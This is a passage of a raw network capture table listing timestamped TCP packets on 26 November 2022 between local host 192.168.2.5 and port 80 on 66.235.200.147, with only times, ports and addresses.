Nov 26, 2022 11:17:42.373354912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373380899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373383999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373392105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373409033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373421907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373436928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373449087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373464108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373478889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373492002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373507977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373519897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373536110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373548031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373563051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373575926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373590946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373605013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373614073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373634100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373640060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373660088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373673916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373687983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373699903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373717070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373729944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373744011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373754978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373773098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373785019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373800039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373822927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373826027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373852968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373879910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373891115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373907089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373918056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373918056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373931885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373951912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373972893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373995066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374017000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374036074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374048948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374054909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374073982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374074936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374087095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374097109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374120951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374125957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374150991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374187946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374203920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374217033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374232054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374244928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374264002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374273062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374284029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374300003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374314070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374329090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374347925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374357939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374368906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374385118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374406099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374412060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374427080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374439001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374454021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374465942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374484062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374491930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374516010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374520063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374531984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374548912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374572039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374578953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374597073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374599934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374618053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374619961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374639988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374644995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374659061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374660015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374675989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374680042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374700069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374721050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374744892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374769926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374789953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374809980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374809980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374814034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374825954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374842882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374851942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374861956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374888897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374905109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374914885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374926090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374946117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374948025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374965906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374979973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374979973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.374988079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.374995947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375009060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375020027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375031948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375066996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375082970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375082970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375093937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375101089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375116110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375117064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375137091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375138998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375157118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375166893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375176907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375180960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375197887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375200033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375216961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375225067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375236988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375241041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375257969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375266075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375277996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375303984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375304937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375325918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375325918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375344992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375351906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375364065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375374079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375384092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375395060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375403881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375408888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375422001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375423908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375439882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375442982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375464916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375464916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375478983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375483990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375504017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375508070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375524044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375529051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375545979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375550032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375570059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375590086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375596046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375608921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375622034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375628948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375648022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375648022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375660896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375668049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375672102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375686884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375693083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375706911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375709057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375726938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375740051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375746012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375751019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375765085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375766993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375786066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375786066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375802994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375806093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375825882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375828981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375844002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375850916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375871897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375885010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375891924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375896931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375911951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375914097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375930071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375931025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375953913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.375957966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375977993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375998020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.375997066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376017094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376023054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376036882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376050949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376055956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376071930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376075029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376082897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376095057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376095057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376115084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376117945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376130104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376135111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376152039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376153946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376173019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376177073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376188040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376193047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376214027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376216888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376229048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376233101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376252890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376255035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376274109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376276016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376288891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376295090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376315117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376334906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376338959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376355886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376363039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376375914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376386881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376395941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376400948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376415014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376422882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376435041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376435041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376455069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376456022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376476049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376482964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376494884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376498938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376513004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376514912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376534939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376542091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376560926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376569986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376594067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376614094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376615047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376635075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376640081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376653910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376663923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376673937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376681089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376693010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376693964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376710892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376717091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376729012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376732111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376750946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376751900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376769066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376777887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376790047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376790047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376806974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376808882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376827002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376827955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376844883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376847029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376866102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376869917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376883030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376884937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376904011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376905918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376920938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376923084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376941919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376944065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376957893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376961946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.376981020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.376982927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377002001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377002001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377017021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377021074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377041101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377042055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377057076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377059937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377079010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377080917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377094984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377099991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377119064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377119064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377136946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377139091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377157927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377157927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377177000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377180099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377192020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377197027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377217054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377218962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377233028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377235889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377255917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377260923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377275944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377276897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377291918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377306938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377317905 CET	49707	80	192.168.2.5	66.235.200.147
